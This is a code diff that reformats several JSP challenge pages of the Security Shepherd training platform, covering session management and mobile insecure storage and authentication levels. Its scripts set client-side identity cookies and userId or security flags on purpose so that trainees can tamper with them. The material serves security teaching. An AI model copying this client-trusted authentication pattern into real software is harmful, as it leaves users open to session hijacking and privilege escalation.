+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            document.cookie = "currentPerson=YUd1ZXN0";
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    userId: "d3d9446802a44259755d38e6d163e820",
-                    secure: "true"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-    $("#aUserName").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
-
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-
-    $("#leForm2").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            document.cookie = "currentPerson=YUd1ZXN0";
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>UserList",
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					document.cookie="currentPerson=YUd1ZXN0";
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							userId: "d3d9446802a44259755d38e6d163e820",
+							secure: "true"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+			$("#aUserName").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+			
+			$("#leForm2").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					document.cookie="currentPerson=YUd1ZXN0";
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>UserList",
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4.jsp b/src/main/webapp/challenges/ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4.jsp
index 930d962c7..dce4dde9b 100644
--- a/src/main/webapp/challenges/ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4.jsp
+++ b/src/main/webapp/challenges/ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4.jsp
@@ -1,93 +1,100 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Insecure Data Storage 2";
+String levelName = "Mobile Insecure Data Storage 2";
 //Alphanumeric Only
-    String levelHash = "ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4";
+String levelHash = "ec09515a304d2de1f552e961ab769967bdc75740ad2363803168b7907c794cd4";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge2.challengeName");
-    String paragraph1 = bundle.getString("challenge2.para1");
+String LevelName = bundle.getString("challenge2.challengeName");
+String paragraph1 = bundle.getString("challenge2.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= levelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= levelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= levelName %>
-    </h2>
-    <p>
-        <br/>
-        <%= paragraph1 %>
-        <br/> <br/>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= levelName %></h2>
+		<p>
+			<br />
+			<%= paragraph1 %>
+			<br /> <br />
 
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " InsecureData2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " InsecureData2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.jsp b/src/main/webapp/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.jsp
index 436dbe184..74fbf433d 100644
--- a/src/main/webapp/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.jsp
+++ b/src/main/webapp/challenges/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.jsp
@@ -1,160 +1,169 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Broken Authentication and Session Management Challenge Four
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelHash = "ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6";
-    String levelName = "Session Management Challenge Four";
+/**
+ * Broken Authentication and Session Management Challenge Four
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
+String levelHash = "ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6";
+String levelName = "Session Management Challenge Four";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.sessionManagement." + levelHash, locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
+String i18nLevelName = bundle.getString("challenge.challengeName");
 
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-        <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.adminButton") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %>
-                    </p>
-                    <div style="display: none;" id="hintButton">
-                        <input type="button"
-                               value="<%= bundle.getString("challenge.hint") %>"
-                               id="theHintButton"/>
-                    </div>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+			<br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.adminButton") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("challenge.form.loading") %></p>
+						<div style="display: none;" id="hintButton">
+							<input type="button"
+								value="<%= bundle.getString("challenge.hint") %>"
+								id="theHintButton" />
+						</div>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        counter = counter + 1;
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            document.cookie = "SubSessionID=TURBd01EQXdNREF3TURBd01EQXdNUT09";
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    userId: "0000000000000001",
-                    useSecurity: "true"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                    if (counter == 3) {
-                        $("#hintButton").show("slow");
-                    }
-                });
-            });
-        });
-    });
-    $("#aUserName").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
-
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				counter = counter + 1;
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					document.cookie="SubSessionID=TURBd01EQXdNREF3TURBd01EQXdNUT09";
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							userId: "0000000000000001",
+							useSecurity: "true"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+							if (counter == 3)
+							{
+								$("#hintButton").show("slow");
+							}
+						});
+					});
+				});
+			});
+			$("#aUserName").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+			
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
+			
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467.jsp b/src/main/webapp/challenges/efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467.jsp
index 2baba4113..870794418 100644
--- a/src/main/webapp/challenges/efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467.jsp
+++ b/src/main/webapp/challenges/efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467.jsp
@@ -1,91 +1,98 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Poor Authentication 1";
+String levelName = "Mobile Poor Authentication 1";
 //Alphanumeric Only
-    String levelHash = "efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467";
+String levelHash = "efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.insecureData.insecureDataStrings", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge1.challengeName");
-    String paragraph1 = bundle.getString("challenge1.para1");
+String LevelName = bundle.getString("challenge1.challengeName");
+String paragraph1 = bundle.getString("challenge1.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= levelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= levelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= levelName %>
-    </h2>
-    <p>
-        <br/>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " PoorAuthentication2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
-    </p>
-</div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= levelName %></h2>
+		<p>
+			<br />
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " PoorAuthentication2.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
-<%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+<% 
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
